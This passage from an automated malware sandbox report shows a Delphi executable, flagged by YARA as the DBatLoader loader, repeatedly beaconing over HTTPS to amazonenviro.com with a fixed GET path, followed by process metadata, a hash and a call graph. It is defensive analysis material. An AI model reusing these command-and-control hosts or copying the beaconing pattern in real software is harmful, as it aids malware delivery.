                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      46 | 192.168.2.7 | 50067 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:34 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:35 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:34 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      47 | 192.168.2.7 | 50069 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:36 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:36 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:36 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      48 | 192.168.2.7 | 50071 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:37 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:38 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:38 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      49 | 192.168.2.7 | 50073 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:39 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:39 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:39 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      50 | 192.168.2.7 | 50075 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:41 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:41 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:41 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      51 | 192.168.2.7 | 50077 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:42 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:43 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:43 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      52 | 192.168.2.7 | 50079 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:44 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:44 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:44 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      53 | 192.168.2.7 | 50081 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:45 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:46 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:46 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      54 | 192.168.2.7 | 50083 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:47 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:48 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:47 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      55 | 192.168.2.7 | 50085 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:49 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:49 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:49 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      56 | 192.168.2.7 | 50087 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:50 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:51 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:51 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      57 | 192.168.2.7 | 50089 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:52 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:52 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:52 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      58 | 192.168.2.7 | 50091 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:53 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:54 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:54 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      59 | 192.168.2.7 | 50093 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:55 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:56 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:56 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      60 | 192.168.2.7 | 50095 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:57 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:57 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:57 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      61 | 192.168.2.7 | 50097 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:25:58 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:59 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:59 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      62 | 192.168.2.7 | 50099 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:00 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:01 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:00 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      63 | 192.168.2.7 | 50101 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:02 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:02 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:02 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      64 | 192.168.2.7 | 50103 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:03 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:04 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:04 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      65 | 192.168.2.7 | 50105 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:05 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:05 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:05 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      66 | 192.168.2.7 | 50107 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:06 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:07 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:07 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      67 | 192.168.2.7 | 50109 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:08 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:09 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:08 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      68 | 192.168.2.7 | 50111 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:10 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:10 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:10 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      69 | 192.168.2.7 | 50113 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:11 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:12 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:12 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      70 | 192.168.2.7 | 50115 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:13 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:14 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:13 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      71 | 192.168.2.7 | 50117 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:15 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:15 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:15 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      72 | 192.168.2.7 | 50119 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:16 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:17 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:17 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      73 | 192.168.2.7 | 50121 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:18 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:18 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:18 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      74 | 192.168.2.7 | 50123 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:19 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:20 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      75 | 192.168.2.7 | 50125 | 166.62.27.188 | 443 | 7852 | C:\Users\user\Desktop\JDQS879kiy.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2025-01-14 07:26:21 UTC | 165 | OUT | GET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:26:22 UTC | 225 | IN | HTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:26:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Target ID:0
                      Start time:02:24:15
                      Start date:14/01/2025
                      Path:C:\Users\user\Desktop\JDQS879kiy.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\JDQS879kiy.exe"
                      Imagebase:0x400000
                      File size:1'161'216 bytes
                      MD5 hash:E9802E45A66C963CED0E7C60C899C5CD
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Yara matches:
                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2622490407.0000000002356000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2636506576.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                        Execution Graph

                        Execution Coverage:6.4%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:14.6%
                        Total number of Nodes:268
                        Total number of Limit Nodes:16

                        Control-flow Graph

call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c 
call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c * 16 call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 284480c call 284494c call 28446a4 call 2844798 call 284494c call 28446a4 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 28446a4 * 2 call 285881c call 2857b90 call 2858184 call 284480c 